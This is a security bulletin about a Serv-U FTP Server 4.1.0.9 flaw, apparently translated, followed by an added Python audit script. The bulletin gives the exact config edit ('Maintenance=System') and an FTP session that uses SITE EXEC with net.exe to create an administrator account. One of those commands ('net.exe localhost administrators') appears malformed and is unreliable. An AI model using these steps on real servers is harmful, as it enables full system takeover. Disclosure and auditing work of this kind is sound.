Local privilege escalation: Yes
Remote privilege escalation: Yes
Exploitation preconditions: write permission on the Serv-U configuration file
Note: this describes a privilege escalation idea and method only.
1. Affected software
Serv-U FTP Server 4.1.0.9 (and all previous versions)
2. Affected systems
All versions of Microsoft Windows Server 2003
All versions of Microsoft Windows XP
All versions of Microsoft Windows 2000
All versions of Microsoft Windows NT
3. Overview
Serv-U FTP Server is an FTP server produced by RhinoSoft and now widely used around the world. I found that Serv-U FTP Server stores its configuration in the file ServUDaemon.ini in the Serv-U FTP Server installation directory. If a local limited user, or a remote attacker with ordinary access, can reach this file and carefully edit its contents, the FTP process can be used to execute arbitrary commands on the system with SYSTEM privileges.
4. Defect analysis
Serv-U FTP Server stores user configuration information, including each user's permissions and the directories the user may access, in the ServUDaemon.ini file. As long as a local limited user or a remote attacker can read and write the Serv-U FTP Server installation directory, they can modify the ServUDaemon.ini file in that directory and use the FTP process to execute arbitrary commands with local system administrator privileges, either locally or remotely. The operating system version makes no difference. (Installations that select "store user information in the system registry" are not affected by this defect.)
5. Test method
1. Local test
Suppose a local limited user can browse the Serv-U FTP Server installation directory. Find the ServUDaemon.ini file and open it in Notepad; its original content is generally as follows:
[GLOBAL]
Version=4.1.0.0 // Serv-U FTP Server version number
ProcessID=584
RegistratinKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0 // host IP, domain name and port settings
[Domain1]
User1=zihuan|1|0
[USER=zihuan|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c: // directory the user may browse
TimeOut=600
Access1=C:|RWAMLCDP
Modify the ServUDaemon.ini file as follows:
[GLOBAL]
Version=4.1.0.0
ProcessID=584
RegistratinKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0
[Domain1]
User1=zihuan|1|0
[USER=zihuan|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c:
TimeOut=600
Maintenance=System // permission type
Access1=C:|RWAMELCDP
Compared with the original content, the line "Maintenance=System" has been added. Save the edited file, then log in to Serv-U FTP Server with an FTP client and run the following commands:
ftp> open ip
Connected to ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready ...
User (ip: (none)): id // enter the user name
331 User name okay, please send complete E-mail address as password.
Password: password // enter the password
230 User logged in, proceed.
ftp> cd winnt // enter the winnt directory on Windows 2000; on Windows XP or Windows Server 2003 it is the windows directory
250 Directory changed to /WINNT
ftp> cd system32 // enter the system32 directory
250 Directory changed to /WINNT/system32
ftp> quote site exec net.exe user zihuan ziHUAN /add // use the system's net.exe to add a user
200 EXEC command successful (TID = 33).
ftp> quote site exec net.exe localhost administrators zihuan /add // promote the user to administrator
This adds a superuser named zihuan with the password ziHUAN to the local system. You can also run quote site exec net.exe localhost administrators user /add directly to move the current user into the administrators group. Naturally, any command can then be executed on the system.
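An added defensive check, not part of the original bulletin: a Python audit that parses a ServUDaemon.ini in the layout shown above (constructed sample, with a placeholder in place of the password hash) and flags user sections that carry Maintenance=System or an execute right in an Access line. Treating the E flag as the execute right is an assumption based on the flag the modified Access1 line above adds to the original.

```python
import re
# Constructed ServUDaemon.ini excerpt in the layout shown above; the
# password value is a placeholder, not a real Serv-U hash.
SAMPLE_INI = """\
[Domain1]
User1=zihuan|1|0
User2=backup|1|0
[USER=zihuan|1]
Password=PLACEHOLDER_HASH
HomeDir=c:
Maintenance=System
Access1=C:|RWAMELCDP
[USER=backup|1]
Password=PLACEHOLDER_HASH
HomeDir=c:\\ftp\\backup
Access1=c:\\ftp\\backup|RWAMLCDP
"""

def parse_ini(text):
    """Return {section: {key: value}} for Serv-U's plain key=value layout."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip()] = value.strip()
    return sections

def audit_users(text):
    """Return (user, reason) findings for risky settings in user sections."""
    findings = []
    for section, keys in parse_ini(text).items():
        match = re.match(r"USER=([^|]+)\|", section)
        if not match:
            continue
        user = match.group(1)
        # Maintenance=System turns an ordinary FTP account into a server administrator.
        if keys.get("Maintenance", "").lower() == "system":
            findings.append((user, "Maintenance=System"))
        for key, value in keys.items():
            if key.startswith("Access") and "|" in value:
                path, flags = value.rsplit("|", 1)
                # Assumption: 'E' is the execute right added in the modified Access1 line.
                if "E" in flags.upper():
                    findings.append((user, f"execute flag on {path}"))
    return findings
```

Run it against a live ServUDaemon.ini after any change to the installation directory's permissions; an empty result for every ordinary account is the expected state.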
Statement:
This article only describes a possible security problem; the author and Hackers X Files magazine provide no guarantee or promise in this security bulletin. Any direct or indirect loss resulting from the spread or use of the information provided in this article is the responsibility of the user, and the author assumes no responsibility for it. The author reserves the right to revise and interpret this security bulletin. When reproducing or transmitting this article, keep it complete, including the copyright notice and all other content. Without the author's permission, no part of this bulletin may be modified or changed.